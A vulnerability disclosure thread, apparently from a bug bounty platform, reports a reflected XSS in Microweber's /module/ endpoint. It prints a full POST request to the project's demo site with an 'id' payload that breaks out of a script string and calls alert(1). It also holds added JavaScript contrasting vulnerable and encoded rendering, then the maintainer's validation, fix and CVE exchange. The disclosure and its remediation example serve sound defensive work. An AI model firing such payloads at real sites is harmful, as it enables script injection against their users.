Cross-site Scripting (XSS) - Reflected in microweber/microweber

Valid

Reported on

Jul 14th 2022


Description

Hi team, I found XSS at /module/.

Proof of Concept

Pop up POC: [screenshot not included in this extract]

Reflected POC: [screenshot not included in this extract]

Full request payload:

POST /demo/module/ HTTP/1.1
Host: demo.microweber.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close

type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings

Impact

XSS

Occurrences

This function does not filter the 'id' parameter inside the script tag, which allows attackers to escape the syntax using an apostrophe.
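The sink described above, as an added example that is not Microweber's code: the "id" request parameter is concatenated into an inline script template, so an apostrophe in the value ends the string literal and the rest of the parameter is parsed as code. The template shape used here (jQuery ready handler wrapping an mw.$ selector built from the id) is an assumption modelled on the request body in the report, not the project's real template. The example puts the vulnerable rendering beside two defensive layers, an allowlist for element ids and a JavaScript string-literal encoder, and includes a small stub harness that runs a rendered script offline to show which version lets the value become code.

```javascript
// Added example, not Microweber's code. The template shape below is an
// ASSUMPTION modelled on the report's request; the real template may differ.

// Constructed input modelled on the report's URL-decoded "id" value.
const REPORTED_ID =
  "js-ajax-cart');});function $(num1){alert(1);return String(num1)}" +
  "$(document).ready(function (){mw.$('";

// Vulnerable pattern (assumed template shape): raw concatenation into a
// single-quoted JS string literal. An apostrophe in `id` ends the literal.
function renderVulnerable(id) {
  return "$(document).ready(function () { mw.$('#" + id +
    "-checkout-process').show(); });";
}

// Encode an untrusted value as a JS string literal. JSON.stringify handles
// quotes, backslashes and control characters; the extra replacements stop
// "</script>" from ending the script block and escape the two Unicode line
// terminators that JSON allows but older JS engines reject inside literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Allowlist for an element-id fragment: a letter, then letters, digits, '-' or '_'.
const ELEMENT_ID_RE = /^[A-Za-z][A-Za-z0-9_-]{0,63}$/;
function isValidElementId(id) {
  return typeof id === "string" && ELEMENT_ID_RE.test(id);
}

// Defence in depth: the encoder alone keeps even the reported payload inside
// the literal, so it is data in the script, never code.
function renderEncoded(id) {
  return "$(document).ready(function () { mw.$('#' + " + jsStringLiteral(id) +
    " + '-checkout-process').show(); });";
}

// Hardened pattern: reject anything that is not a plausible element id, and
// still encode what is accepted.
function renderSafe(id) {
  if (!isValidElementId(id)) {
    throw new Error("rejected id parameter: " + JSON.stringify(id));
  }
  return renderEncoded(id);
}

// Offline harness: run a rendered script with stubbed jQuery/mw/alert and
// record what it did. A value that escaped the literal shows up as an alert
// call; a value that stayed data shows up as the selector string.
function runWithStubs(script) {
  const result = { alertCalls: 0, selectors: [], error: null };
  const jq = () => ({ ready: (fn) => fn() });
  const mw = { $: (sel) => { result.selectors.push(sel); return { show() {} }; } };
  const alert = () => { result.alertCalls += 1; };
  try {
    // The body is parsed as a whole program before anything runs, so an
    // injected `function $` declaration shadows the stub parameter.
    new Function("$", "mw", "document", "alert", script)(jq, mw, {}, alert);
  } catch (e) {
    result.error = String(e);
  }
  return result;
}
```

Running `runWithStubs(renderVulnerable(REPORTED_ID))` records one alert call, while `runWithStubs(renderEncoded(REPORTED_ID))` records no alert and a single selector equal to the whole payload wrapped in `#...-checkout-process`; `renderSafe` rejects the payload outright and only renders plain ids. For the fix itself, the allowlist is the right first line for a parameter that names a DOM element, and the encoder is what to use wherever a template really must carry an arbitrary string into a script.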

We are processing your report and will contact the microweber team within 24 hours. 10 months ago
We have contacted a member of the microweber team and are waiting to hear back 10 months ago
Peter Ivanov
10 months ago

Maintainer


Hello,

Thanks for the report.

We cannot simulate this. Maybe it was fixed in the previous version.

Can you provide a video of the POC where the user can encounter this error?

Deshine
10 months ago

Researcher


Hi Peter Ivanov, this is full video POC:

https://github.com/Kingerbans/images/blob/main/2022-07-16%2019-32-39.mp4

Maybe you should download the images folder, because the video is too big for GitHub to display.

Hope you validate the issue.

Thank you, deshine

We have sent a follow up to the microweber team. We will try again in 7 days. 10 months ago
Peter Ivanov modified the Severity from Medium to Low 10 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 10 months ago
Deshine has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.21 with commit d28655 10 months ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
index.php#L80-L92 has been validated
Deshine
10 months ago

Researcher


Hi @admin @maintainer, I wonder if I can get a CVE for this vulnerability?

Jamie Slome
10 months ago

Admin


Happy to assign a CVE to this report if the maintainer gives their permission.

@maintainer?

Peter Ivanov
10 months ago

Maintainer


Yes @admin, you can assign a CVE.

Jamie Slome
10 months ago

Admin


Sorted 👍

Deshine
10 months ago

Researcher


Thanks so much @admin @maintainer.
